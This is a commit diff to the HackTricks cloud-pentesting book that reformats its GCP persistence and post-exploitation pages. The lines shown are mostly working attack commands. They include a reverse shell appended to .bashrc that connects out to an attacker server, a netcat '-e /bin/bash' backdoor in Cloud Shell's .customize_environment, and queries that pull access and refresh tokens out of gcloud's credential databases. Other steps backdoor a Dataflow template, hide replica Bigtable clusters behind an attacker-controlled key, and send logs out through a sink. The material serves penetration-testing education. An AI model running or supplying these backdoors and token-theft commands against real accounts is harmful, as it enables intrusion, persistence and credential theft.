gcp

Author: carlospolop

src/SUMMARY.md

@@ -101,7 +101,6 @@
     - [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md)
     - [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md)
     - [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md)
-    - [Gcp Vertex Ai Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md)
     - [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md)
     - [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md)
   - [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md)
@@ -132,6 +131,7 @@
     - [GCP - Serviceusage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md)
     - [GCP - Sourcerepos Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md)
     - [GCP - Storage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md)
+    - [GCP - Vertex AI Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-vertex-ai-privesc.md)
     - [GCP - Workflows Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md)
     - [GCP - Generic Permissions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md)
     - [GCP - Network Docker Escape](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md)
@@ -188,6 +188,7 @@
     - [GCP - Spanner Enum](pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md)
     - [GCP - Stackdriver Enum](pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md)
     - [GCP - Storage Enum](pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md)
+    - [GCP - Vertex AI Enum](pentesting-cloud/gcp-security/gcp-services/gcp-vertex-ai-enum.md)
     - [GCP - Workflows Enum](pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md)
   - [GCP <--> Workspace Pivoting](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md)
     - [GCP - Understanding Domain-Wide Delegation](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md)

src/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigtable-persistence.md

@@ -16,6 +16,10 @@ For more information about Bigtable check:
 
 Create an app profile that routes traffic to your replica cluster and enable Data Boost so you never depend on provisioned nodes that defenders might notice.
 
+<details>
+
+<summary>Create stealth app profile</summary>
+
 ```bash
 gcloud bigtable app-profiles create stealth-profile \
   --instance=<instance-id> --route-any --restrict-to=<attacker-cluster> \
@@ -26,6 +30,8 @@ gcloud bigtable app-profiles update stealth-profile \
   --data-boost-compute-billing-owner=HOST_PAYS
 ```
 
+</details>
+
 As long as this profile exists you can reconnect using fresh credentials that reference it.
 
 ### Maintain your own replica cluster
@@ -34,11 +40,17 @@ As long as this profile exists you can reconnect using fresh credentials that re
 
 Provision a minimal node-count cluster in a quiet region. Even if your client identities disappear, **the cluster keeps a full copy of every table** until defenders explicitly remove it.
 
+<details>
+
+<summary>Create replica cluster</summary>
+
 ```bash
 gcloud bigtable clusters create dark-clone \
   --instance=<instance-id> --zone=us-west4-b --num-nodes=1
 ```
 
+</details>
+
 Keep an eye on it through `gcloud bigtable clusters describe dark-clone --instance=<instance-id>` so you can scale up instantly when you need to pull data.
 
 ### Lock replication behind your own CMEK
@@ -47,12 +59,18 @@ Keep an eye on it through `gcloud bigtable clusters describe dark-clone --instan
 
 Bring your own KMS key when spinning up a clone. Without that key, Google cannot re-create or fail over the cluster, so blue teams must coordinate with you before touching it.
 
+<details>
+
+<summary>Create CMEK-protected cluster</summary>
+
 ```bash
 gcloud bigtable clusters create cmek-clone \
   --instance=<instance-id> --zone=us-east4-b --num-nodes=1 \
   --kms-key=projects/<attacker-proj>/locations/<kms-location>/keyRings/<ring>/cryptoKeys/<key>
 ```
 
+</details>
+
 Rotate or disable the key in your project to instantly brick the replica (while still letting you turn it back on later).
 
 {{#include ../../../banners/hacktricks-training.md}}

src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md

@@ -24,18 +24,30 @@ This console has some interesting capabilities for attackers:
 
 This basically means that an attacker may put a backdoor in the home directory of the user and as long as the user connects to the GC Shell every 120days at least, the backdoor will survive and the attacker will get a shell every time it's run just by doing:
 
+<details>
+
+<summary>Add reverse shell to .bashrc</summary>
+
 ```bash
 echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc
 ```
 
+</details>
+
 There is another file in the home folder called **`.customize_environment`** that, if exists, is going to be **executed everytime** the user access the **cloud shell** (like in the previous technique). Just insert the previous backdoor or one like the following to maintain persistence as long as the user uses "frequently" the cloud shell:
 
+<details>
+
+<summary>Create .customize_environment backdoor</summary>
+
 ```bash
 #!/bin/sh
 apt-get install netcat -y
 nc <LISTENER-ADDR> 443 -e /bin/bash
 ```
 
+</details>
+
 > [!WARNING]
 > It is important to note that the **first time an action requiring authentication is performed**, a pop-up authorization window appears in the user's browser. This window must be accepted before the command can run. If an unexpected pop-up appears, it could raise suspicion and potentially compromise the persistence method being used.
 
@@ -45,11 +57,17 @@ This is the pop-up from executing `gcloud projects list` from the cloud shell (a
 
 However, if the user has actively used the cloudshell, the pop-up won't appear and you can **gather tokens of the user with**:
 
+<details>
+
+<summary>Get access tokens from Cloud Shell</summary>
+
 ```bash
 gcloud auth print-access-token
 gcloud auth application-default print-access-token
 ```
 
+</details>
+
 #### How the SSH connection is stablished
 
 Basically, these 3 API calls are used:

src/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md

@@ -8,6 +8,10 @@
 
 Following the [**tutorial from the documentation**](https://cloud.google.com/dataflow/docs/guides/templates/using-flex-templates) you can create a new (e.g. python) flex template:
 
+<details>
+
+<summary>Create Dataflow flex template with backdoor</summary>
+
 ```bash
 git clone https://github.com/GoogleCloudPlatform/python-docs-samples.git
 cd python-docs-samples/dataflow/flex-templates/getting_started
@@ -38,10 +42,16 @@ gcloud dataflow $NAME_TEMPLATE build gs://$REPOSITORY/getting_started-py.json \
  --region=us-central1
 ```
 
+</details>
+
 **While it's building, you will get a reverse shell** (you could abuse env variables like in the previous example or other params that sets the Docker file to execute arbitrary things). In this moment, inside the reverse shell, it's possible to **go to the `/template` directory and modify the code of the main python script that will be executed (in our example this is `getting_started.py`)**. Set your backdoor here so everytime the job is executed, it'll execute it.
 
 Then, next time the job is executed, the compromised container built will be run:
 
+<details>
+
+<summary>Run Dataflow template</summary>
+
 ```bash
 # Run template
 gcloud dataflow $NAME_TEMPLATE run testing \
@@ -50,6 +60,8 @@ gcloud dataflow $NAME_TEMPLATE run testing \
  --region=us-central1
 ```
 
+</details>
+
 {{#include ../../../banners/hacktricks-training.md}}
 
 

src/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md

@@ -14,10 +14,16 @@ Find more information about Logging in:
 
 Create a sink to exfiltrate the logs to an attackers accessible destination:
 
+<details>
+
+<summary>Create logging sink</summary>
+
 ```bash
 gcloud logging sinks create <sink-name> <destination> --log-filter="FILTER_CONDITION"
 ```
 
+</details>
+
 {{#include ../../../banners/hacktricks-training.md}}
 
 

src/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.md

@@ -6,10 +6,16 @@
 
 To get the **current token** of a user you can run:
 
+<details>
+
+<summary>Get access token from SQLite database</summary>
+
 ```bash
 sqlite3 $HOME/.config/gcloud/access_tokens.db "select access_token from access_tokens where account_id='<email>';"
 ```
 
+</details>
+
 Check in this page how to **directly use this token using gcloud**:
 
 {{#ref}}
@@ -18,18 +24,30 @@ https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/
 
 To get the details to **generate a new access token** run:
 
+<details>
+
+<summary>Get refresh token from SQLite database</summary>
+
 ```bash
 sqlite3 $HOME/.config/gcloud/credentials.db "select value from credentials where account_id='<email>';"
 ```
 
+</details>
+
 It's also possible to find refresh tokens in **`$HOME/.config/gcloud/application_default_credentials.json`** and in **`$HOME/.config/gcloud/legacy_credentials/*/adc.json`**.
 
 To get a new refreshed access token with the **refresh token**, client ID, and client secret run:
 
+<details>
+
+<summary>Get new access token using refresh token</summary>
+
 ```bash
 curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token
 ```
 
+</details>
+
 The refresh tokens validity can be managed in **Admin** > **Security** > **Google Cloud session control**, and by default it's set to 16h although it can be set to never expire:
 
 <figure><img src="../../../images/image (11).png" alt=""><figcaption></figcaption></figure>
@@ -51,12 +69,22 @@ Then, gcloud will use the state and code with a some hardcoded `client_id` (`325
 
 You can find all Google scopes in [https://developers.google.com/identity/protocols/oauth2/scopes](https://developers.google.com/identity/protocols/oauth2/scopes) or get them executing:
 
+<details>
+
+<summary>Get all Google OAuth scopes</summary>
+
 ```bash
 curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-A/\-\._]*' | sort -u
 ```
 
+</details>
+
 It's possible to see which scopes the application that **`gcloud`** uses to authenticate can support with this script:
 
+<details>
+
+<summary>Test supported scopes for gcloud</summary>
+
 ```bash
 curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
     echo -ne "Testing $scope         \r"
@@ -67,6 +95,8 @@ curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE
 done
 ```
 
+</details>
+
 After executing it it was checked that this app supports these scopes:
 
 ```

src/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md

@@ -14,6 +14,10 @@ For more information about Cloud Storage check:
 
 You can create an HMAC to maintain persistence over a bucket. For more information about this technique [**check it here**](../gcp-privilege-escalation/gcp-storage-privesc.md#storage.hmackeys.create).
 
+<details>
+
+<summary>Create and use HMAC key for Storage access</summary>
+
 ```bash
 # Create key
 gsutil hmac create <sa-email>
@@ -25,6 +29,8 @@ gsutil config -a
 gsutil ls gs://[BUCKET_NAME]
 ```
 
+</details>
+
 Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).
 
 ### Give Public Access

src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md

@@ -28,10 +28,16 @@ With these permissions it's possible to:
 
 With this permission it's possible to **see the logs of the App**:
 
+<details>
+
+<summary>Tail app logs</summary>
+
 ```bash
 gcloud app logs tail -s <name>
 ```
 
+</details>
+
 ### Read Source Code
 
 The source code of all the versions and services are **stored in the bucket** with the name **`staging.<proj-id>.appspot.com`**. If you have write access over it you can read the source code and search for **vulnerabilities** and **sensitive information**.